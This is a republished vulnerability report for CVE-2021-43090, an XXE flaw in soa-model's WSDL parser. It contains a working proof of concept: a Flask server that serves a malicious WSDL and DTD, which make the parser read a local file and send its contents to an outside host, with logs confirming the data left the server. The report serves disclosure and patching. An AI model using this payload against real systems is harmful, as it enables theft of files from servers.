Headline

CVE-2021-43090: There is an XXE vulnerability in parsing wsdl. · Issue #281 · membrane/soa-model

An XML External Entity (XXE) vulnerability exists in all versions of soa-model (as of 11.01/2021) in the WSDLParser function.

3 years ago

CVE

Open in Source

#vulnerability #java

There is an XXE vulnerability in parsing wsdl.

Add pom.xml the latest version of soa-model-core.

<!-- https://mvnrepository.com/artifact/com.predic8/soa-model-core -->
<dependency>
    <groupId>com.predic8</groupId>
    <artifactId>soa-model-core</artifactId>
    <version>1.6.3</version>
</dependency>

XXE vulnerability appeared when crawling remote wsdl file and parsing.

import com.predic8.wsdl.*; public class testxxe { public static void main(String[] args) { WSDLParser parser = new WSDLParser(); Definitions defs = parser.parse(“http://ip:10000/testxxeService?wsdl”); } }

Construct server with evil wsdl file by flask

from flask import Flask, Response,request

app = Flask(__name__)

@app.route('/testxxeService’, defaults={’path’: '’}) def catch_all(path): global num xml = “""<?xml version="1.0” encoding="UTF-8"?> <!DOCTYPE data [ <!ENTITY % dtd SYSTEM “http://ip:10000/data.dtd"> %dtd; ]> <data>&send;</data>""” return Response(xml, mimetype=’text/xml’,status=200) @app.route('/data.dtd’, defaults={’path’: '’}) def hello(path): global num xml = """<!ENTITY % file SYSTEM "file:///tmp/123"> <!ENTITY % int “<!ENTITY % send SYSTEM 'http://ip:10000/?filecontent=%file;’>"> %int; %send;""” return Response(xml, mimetype=’text/xml’,status=200) if __name__ == "__main__": app.run(host=’0.0.0.0’, port=10000)

Create a test file /tmp/123

$ echo 123123 > /tmp/123 $ cat /tmp/123 123123

Run java code and xxe attack successfully.

127.0.0.1 - - [25/Oct/2021 16:04:49] "GET /testxxeService?wsdl HTTP/1.1" 200 -
127.0.0.1 - - [25/Oct/2021 16:04:49] "GET /data.dtd HTTP/1.1" 200 -
127.0.0.1 - - [25/Oct/2021 16:04:49] "GET /?filecontent=123123 HTTP/1.1" 404 -


core/src/main/groovy/com/predic8/schema/Include.groovy line42
def incToken = XMLInputFactory.newInstance().createXMLStreamReader(resource)

core/src/main/groovy/com/predic8/soamodel/AbstractParser.groovy line51:
XMLInputFactory.newInstance().createXMLStreamReader(res)

Reference https://stackoverflow.com/questions/53934352/xmlstreamreader-inputstream-xxe-vulnerability-showing-up-in-checkmarx-report
XMLInputFactory allow load DTD, so there is an xxe vulnerability.

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda

2 years ago

2 years ago

2 years ago

2 years ago

2 years ago